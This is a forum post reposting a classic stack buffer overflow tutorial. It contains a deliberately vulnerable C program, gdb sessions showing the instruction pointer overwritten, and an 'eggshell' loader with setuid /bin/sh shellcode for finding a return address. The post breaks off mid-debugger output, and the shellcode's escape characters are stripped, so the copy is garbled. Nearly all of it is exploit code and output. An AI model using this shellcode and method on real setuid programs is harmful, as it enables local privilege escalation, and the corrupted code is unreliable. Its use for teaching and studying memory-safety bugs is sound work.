Jump to content
zbeng

Start of paper

By zbeng, in Programare

Recommended Posts

zbeng Newbie

zbeng

Posted
Posted

---------- start of vul.c --------------

/* vul.c by _6mO_HaCk */

#include <stdio.h>

int main(int argc, char * argv[])

{

char buffer[10];

if(argc < 2)

{

printf("Usage : %s buffern", argv[0]);

exit(0);

}

strcpy(buffer,argv[1]);

printf("ur buffer : %s", buffer);

}

----------- end of vul.c ---------------

lets try now to overflow it

[simo@localhost lab]$ gcc vul.c -o vul

[simo@localhost lab]$ ./vul `perl -e 'print "A" x 20'`

ur buffer : AAAAAAAAAAAAAAAAAAAA

20 bytes and still not able to overflow it, lets put a bigger buffer

[simo@localhost lab]$ ./vul `perl -e 'print "A" x 30'`

Segmentation fault (core dumped)

we did it, we were able to overflow

lets try now to see what happened using our favorite debugger gdb

[simo@localhost lab]$ gdb -c core ./vul

GNU gdb 5.0rh-5 Red Hat Linux 7.1

Copyright 2001 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

Core was generated by `./vul AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/i686/libc.so.6...done.

Loaded symbols for /lib/i686/libc.so.6

Reading symbols from /lib/ld-linux.so.2...done.

Loaded symbols for /lib/ld-linux.so.2

#0 0x40003e40 in process_envvars (modep=Cannot access memory at address

0x41414149

) at rtld.c:1463

1463

rtld.c: No such file or directory.

in rtld.c

(gdb) info reg eip

eip 0x40003e40 0x40003e40

(gdb) info reg ebp

ebp 0x41414141 0x41414141

as u see unfortunatly we were able just to rewrite the ebp (extended

base pointer

) address while we couldnt rewrite eip (extended instruction pointer)

seems we

still need a bigger buffer

let's retry with a bigger buffer size

[simo@localhost lab]$ ./vul `perl -e 'print "A" x 32'`

Segmentation fault (core dumped)

[simo@localhost lab]$ gdb -c core ./vul

GNU gdb 5.0rh-5 Red Hat Linux 7.1

Copyright 2001 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

Core was generated by `./vul AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/i686/libc.so.6...done.

Loaded symbols for /lib/i686/libc.so.6

Reading symbols from /lib/ld-linux.so.2...done.

Loaded symbols for /lib/ld-linux.so.2

#0 0x41414141 in ?? ()

(gdb) info reg ebp

ebp 0x41414141 0x41414141

(gdb) info reg eip

eip 0x41414141 0x41414141

(gdb) q

well this time we did it, with a 32 buffer we were able to overwrite

both eip and ebp

with our new address 0x41414141 where 41 is the hex value for the ascii

caracter "A" :)

next step now is to find our shellcode return address, for that we will

have to load an eggshell

into our environment and then overflow the vulnerable program and find

the shellcode return address

a simple eggshell that i have written with setuid shellcode

-------------------------- start eggshell.c ----------------------------

include <stdio.h>

#define NOP 0x90 /* our nops (no operations) */

char shellcode[] =

"x31xc0x31xdbxb0x17xcdx80" /* setuid() (not mine) */

"xebx5ax5ex31xc0x88x46x07x31xc0x31xdbxb0x27xcd"

"x80x85xc0x78x32x31xc0x31xdbx66xb8x10x01xcdx80"

"x85xc0x75x0fx31xc0x31xdbx50x8dx5ex05x53x56xb0"

"x3bx50xcdx80x31xc0x8dx1ex89x5ex08x89x46x0cx50"

"x8dx4ex08x51x56xb0x3bx50xcdx80x31xc0x8dx1ex89"

"x5ex08x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c"

"xcdx80xe8xa1xffxffxffx2fx62x69x6ex2fx73x68";

int main(void)

{

char eggshell[512];

puts("eggshell by _6mO_HaCk, loaded into environment");

memset(eggshell,NOP,512);

memcpy(&eggshell[512-strlen(shellcode)],shellcode,strlen(shellcode));

setenv("EGG", eggshell, 1);

putenv(eggshell);

system("/bin/bash");

return(0);

}

--------------------------- end eggshell.c -----------------------------

[simo@localhost lab]$ gcc eggshell.c -o eggshell; ./eggshell

eggshell by _6mO_HaCk, loaded into environment

[simo@localhost lab]$ ./vul `perl -e 'print "A" x 32'`

Segmentation fault (core dumped)

[simo@localhost lab]$ gdb -c core ./vul

GNU gdb 5.0rh-5 Red Hat Linux 7.1

Copyright 2001 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain

conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-redhat-linux"...

Core was generated by `./vul'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/i686/libc.so.6...done.

Loaded symbols for /lib/i686/libc.so.6

Reading symbols from /lib/ld-linux.so.2...done.

Loaded symbols for /lib/ld-linux.so.2

#0 0x41414141 in ?? ()

(gdb) x/s $esp

0xbffff570:

""

(gdb)

0xbffff571:

""

(gdb)

0xbffff572:

""

(gdb)

0xbffff573:

""

(gdb)

0xbffff574:

"Üõÿ¿äõÿ¿ö202

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...